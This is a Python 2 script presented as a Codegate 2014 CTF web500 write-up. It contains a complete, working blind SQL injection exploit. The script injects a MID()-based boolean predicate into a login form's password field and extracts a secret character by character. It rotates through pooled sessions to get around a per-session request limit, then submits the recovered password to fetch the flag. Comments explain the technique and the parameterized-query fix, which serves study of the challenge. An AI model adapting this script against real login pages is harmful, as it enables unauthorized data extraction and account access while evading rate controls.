
codegate@2014- web500 writeup

  1. #!/usr/bin/env python
  2. #Blind SQL injection Exploit version 1.0
  3. #Language: Python (2.6)
  4. #Author: gamma95
  5.  
  6. import os
  7. import sys
  8. import urllib2
  9. import struct
  10. import urllib
  11. import time
# Banner and usage text, printed on every run before the arguments are checked.
print """
   Codegate@2014: web500 writeup
   https://twitter.com/xchym
   Usage: python web500.py "http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/index.php" "password" "mysql"
"""
# Exactly three positional arguments are required: target URL, the column or
# expression to extract, and the DBMS name (only 'mysql' is accepted by execute()).
if len(sys.argv) != 4:
    print "[+] Syntax Error"
    exit()
url, sql, sqlserver = sys.argv[1:4]
  23.  
def _gen_new_session():
    """Fetch the challenge index page once and return its Set-Cookie header.

    Presumably each call yields a fresh server-side session; execute() builds a
    pool of these so that its requests are spread over several sessions (see the
    note on the Cookie header there). Returns None when the response carries no
    Set-Cookie header. The response object is not explicitly closed.
    """
    response = urllib2.urlopen('http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/')
    return response.info().get('Set-Cookie')
  28.  
def _get_flag(_session, _password):
    """POST the recovered password to auth.php under the given session cookie.

    Arguments:
        _session: value sent verbatim as the Cookie header.
        _password: value sent as the 'password' form field.

    Returns the raw response body, which the caller prints as the flag. There is
    no error handling here: a failed request raises urllib2.URLError to the caller.
    """
    endpoint = 'http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/auth.php'
    headers = {
        'User-Agent': 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
        'Cookie': _session,
    }
    body = urllib.urlencode({'password': _password})
    request = urllib2.Request(endpoint, body, headers)
    return urllib2.urlopen(request).read()
  39.    
def encodeurl(string):
    """Replace every space in *string* with '%20' and return the result.

    Only spaces are encoded; all other reserved characters are left untouched.
    Not called anywhere in this script (execute() uses urllib.urlencode instead).
    """
    return '%20'.join(string.split(' '))
  42.    
def execute(url, sql, sqlserver):
    """Recover a value one character at a time via a boolean-based blind SQL injection.

    Arguments:
        url: login endpoint the injected POST is sent to (also used as Referer).
        sql: column or expression whose value is extracted (second CLI argument).
        sqlserver: must be 'mysql'; any other value prints an error and exits.

    For position i (1..30) every candidate in `dic` is tried by asking the server
    whether MID(<sql>, 1, i) equals the characters found so far plus the
    candidate; the substring "True" in the response body is the oracle. The
    search stops when a full pass over `dic` finds no match. The recovered value
    and the output of _get_flag() are printed; nothing is returned.

    Educational note: the predicate-dependent response ("True" in page) is what
    makes the blind technique possible here; the standard mitigation is
    parameterized queries together with responses that do not vary with the
    injected predicate.
    """
    # Pool of fresh sessions: one per recovered character, with spares (see the
    # note on the Cookie header below).
    _list_session=[]
    for line in xrange(0, 40):
        _list_session.append(_gen_new_session())
    lenght = 9999  # unused (and misspelled); kept as in the original
    if sqlserver =='mysql':
        str1 = " OR 1=1 AND MID("
    else:
        # NOTE: the message says argv[4], but the value actually comes from sys.argv[3].
        print "[+] argv[4] = mssql or mysql !!! Plz check your input"
        exit()
    result = ""
    # Candidate alphabet, tried in this order at every position. A character
    # outside this set cannot be recovered and ends the search early.
    dic = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '$', '.','-','_','(',')','[',']','{','}','@','=','/','\\','|','#','?','!','<','>']
    count = 0  # index into _list_session for the current requests; advanced on every hit
    check = 0  # becomes 1 once a whole pass over dic finds nothing -> stop the outer loop
    for i in range(1, 31):  # position 1..30: MID(<sql>, 1, i) compares a prefix of length i
        user_agent = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20071008 Ubuntu/7.10 (gutsy) Firefox/2.0.0.6'
        kount = 0  # number of candidates tried at this position
        if check == 1:
            break
        for line in dic:
            kount = kount + 1
            flag = 0  # set on a hit but never read
            # Predicate: MID(<sql>,1,i)='<result so far><candidate>', closed with " and '1"
            # so the injected string re-balances the quote opened by "123' ".
            str2 = "," + str(i)+ ")=" + "'" + result + line + "'"
            chuoi = str1 + sql +','+ "1" + str2 + " and '1"
            print chuoi
            values={'password':"123' "+ chuoi}
            data = urllib.urlencode(values)
            # A different session is used for each recovered character: per the
            # original author's note, the server deletes the password once a
            # session exceeds roughly 120 requests. A per-session limit alone is
            # therefore not an effective rate control against this search.
            headers = { 'Host': '58.229.183.24','User-Agent': user_agent, 'Referer' : url, 'Cookie': _list_session[count]}
            req = urllib2.Request(url, data, headers)
            try:
                response = urllib2.urlopen(req)
            except:
                # Bare except: any failure (network, HTTP error, even KeyboardInterrupt)
                # prints this message and ends the run.
                print "[+] Connection error"
                exit()
            page = response.read()
            len1 = len(page)  # unused
            if "True" in page:
                # Hit: append the candidate, move to the next session and the next position.
                count = count + 1
                result = result + line
                print result
                flag = 1
                break  # next position
            elif kount == len(dic):
                # Alphabet exhausted at this position: treat the value as complete.
                check = 1
                break
            else:
                continue
    print "[+]Done, The password is: " + str(result)
    # Log in with the recovered value, using the session at index count (the one
    # in use when the search stopped).
    print "[+]Flag: " + _get_flag(_list_session[count], str(result))
    ##############
  93.     ##############
  94.  
# Entry point. The condition is always true, so the `else` branch below is dead
# code retained from the original; the script always runs execute() and exits.
if True:

    print """
   [+] Sending Malicious Request
   [+] Plz wait ... :)
               """

    execute(url, sql, sqlserver)
else:
    print "Not vul"
    exit()
exit()